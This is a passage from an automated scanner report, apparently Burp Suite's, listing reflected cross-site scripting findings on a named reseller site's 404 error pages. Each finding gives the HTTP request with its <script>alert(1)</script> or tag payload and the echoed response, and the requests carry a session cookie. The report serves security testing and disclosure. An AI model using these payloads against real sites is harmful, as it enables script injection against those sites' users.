GET /detail/41/themes/kosmos/images/rating/4half.gifc7817<script>alert(1)</script>a21fd07a007 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/4half.gifc7817<script>alert(1)</script>a21fd07a007 was not found on this server.</p>
...[SNIP]...

2.2953. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8c1f<script>alert(1)</script>d3a03ec0b55 was submitted as the name of an arbitrarily supplied query-string parameter and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the query string, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/4half.gif?b8c1f<script>alert(1)</script>d3a03ec0b55=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/4half.gif?b8c1f<script>alert(1)</script>d3a03ec0b55=1 was not found on this server.</p>
...[SNIP]...

2.2954. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbbe6<script>alert(1)</script>fd78be396b was submitted in REST URL parameter 1 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbbbe6<script>alert(1)</script>fd78be396b/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbbbe6<script>alert(1)</script>fd78be396b/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2955. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57608<script>alert(1)</script>8618cdfab47 was submitted in REST URL parameter 2 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4157608<script>alert(1)</script>8618cdfab47/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4157608<script>alert(1)</script>8618cdfab47/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2956. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3cf7d<script>alert(1)</script>46bfafe100d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes3cf7d<script>alert(1)</script>46bfafe100d/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes3cf7d<script>alert(1)</script>46bfafe100d/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2957. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee354<script>alert(1)</script>6198bb17393 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmosee354<script>alert(1)</script>6198bb17393/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmosee354<script>alert(1)</script>6198bb17393/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2958. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f485b<script>alert(1)</script>4467ef76a9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/imagesf485b<script>alert(1)</script>4467ef76a9d/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/imagesf485b<script>alert(1)</script>4467ef76a9d/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2959. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c939d<script>alert(1)</script>c8979437fe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/ratingc939d<script>alert(1)</script>c8979437fe5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/ratingc939d<script>alert(1)</script>c8979437fe5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2960. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload beb48<script>alert(1)</script>1876bfe2879 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/search.phpbeb48<script>alert(1)</script>1876bfe2879?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.phpbeb48<script>alert(1)</script>1876bfe2879?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2961. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8e1ae<a>bc9e2ee8080 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search8e1ae<a>bc9e2ee8080&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search8e1ae<a>bc9e2ee8080&opt=2 was not found on this server.</p>
...[SNIP]...

2.2962. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1ebcc<a>c07ca99d563 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...1ebcc<a>c07ca99d563&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...1ebcc<a>c07ca99d563&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2963. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fba11<script>alert(1)</script>3d592e4295a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&fba11<script>alert(1)</script>3d592e4295a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&fba11<script>alert(1)</script>3d592e4295a=1 was not found on this server.</p>
...[SNIP]...

2.2964. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eac61<a>98768da333d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2eac61<a>98768da333d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2eac61<a>98768da333d was not found on this server.</p>
...[SNIP]...

2.2965. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fec15<script>alert(1)</script>e7995665714 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfec15<script>alert(1)</script>e7995665714/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfec15<script>alert(1)</script>e7995665714/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2966. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 340fa<script>alert(1)</script>10710d56ac3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41340fa<script>alert(1)</script>10710d56ac3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41340fa<script>alert(1)</script>10710d56ac3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2967. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd233<script>alert(1)</script>ae18e2a8fc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themescd233<script>alert(1)</script>ae18e2a8fc2/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themescd233<script>alert(1)</script>ae18e2a8fc2/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2968. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b7f0<script>alert(1)</script>9bbb11a5747 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos3b7f0<script>alert(1)</script>9bbb11a5747/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos3b7f0<script>alert(1)</script>9bbb11a5747/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2969. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 72a07<script>alert(1)</script>a237b44b2c6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images72a07<script>alert(1)</script>a237b44b2c6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images72a07<script>alert(1)</script>a237b44b2c6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

